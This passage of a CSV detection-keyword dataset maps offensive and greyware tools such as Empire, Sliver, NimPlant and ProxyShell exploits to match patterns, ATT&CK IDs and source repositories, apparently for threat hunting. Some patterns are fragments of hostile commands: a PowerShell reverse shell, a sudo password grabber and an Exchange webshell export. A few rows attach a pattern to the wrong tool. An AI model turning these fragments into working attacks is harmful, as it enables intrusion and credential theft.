Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-InMemoryModule*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell 
spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*new-operator --name * --lhost *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*New-PSAmsiScanner -*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*New-PSDrive -Name T -PSProvider FileSystem -Root \\$IP\transfer *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*New-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*New-UserPersistenceOption*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*New-WmiSession.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*Nexpose*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://www.rapid7.com/products/nexpose/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nextnet.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*NextronSystems*","offensive_tool_keyword","Github Username","Author of APT simulator","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/NextronSystems","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nginx/striker.log*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - 
T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ngrok tcp *","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*nheiniger/SnaffPoint*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*nhfjkakglbnnpkpldhjmpmmfefifedcj*","greyware_tool_keyword","Pron VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nhnfcgpcbfclhfafjlooihdfghaeinfc*","greyware_tool_keyword","Surf VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Nick Swink aka c0rnbread*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","0","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*nickvourd/COM-Hunter*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*nickvourd/Supernova*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - 
TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Nightmangle-master*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*nikto/program*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"*NimBlackout*.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*NimBlackout.*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*NimBlackout-main*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*nimbo_main*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and 
lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbo_prompt_color*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbo_root*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Nimbo-C2 w1ll r0ck y0ur w0rld*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Nimbo-C2*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Nimbo-C2.*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbo-dependencies*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*nimbuspwn.py*","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","1","N/A","N/A","1","21","5","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" +"*nimcrypt -*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*nimcrypt --file *","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim 
project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" +"*nimcrypt.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"*NimExec.exe*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*NimExec-master*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" +"*NimPlant v*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplant-*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.tar.gz*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant*.zip*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplant.db*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.dll*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.nimble*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimPlant.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" 
+"*nimplantPrint*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants-*.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*nimplants.html*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*NimShellCodeLoader*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*NimSyscallLoader -*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with 
some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Ninja c2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*ninjac2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*nipe.pl *","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1692","315","2023-09-22T12:35:29Z","2015-09-07T18:47:10Z" +"*nishang.exe*","offensive_tool_keyword","nishang","Nishang is 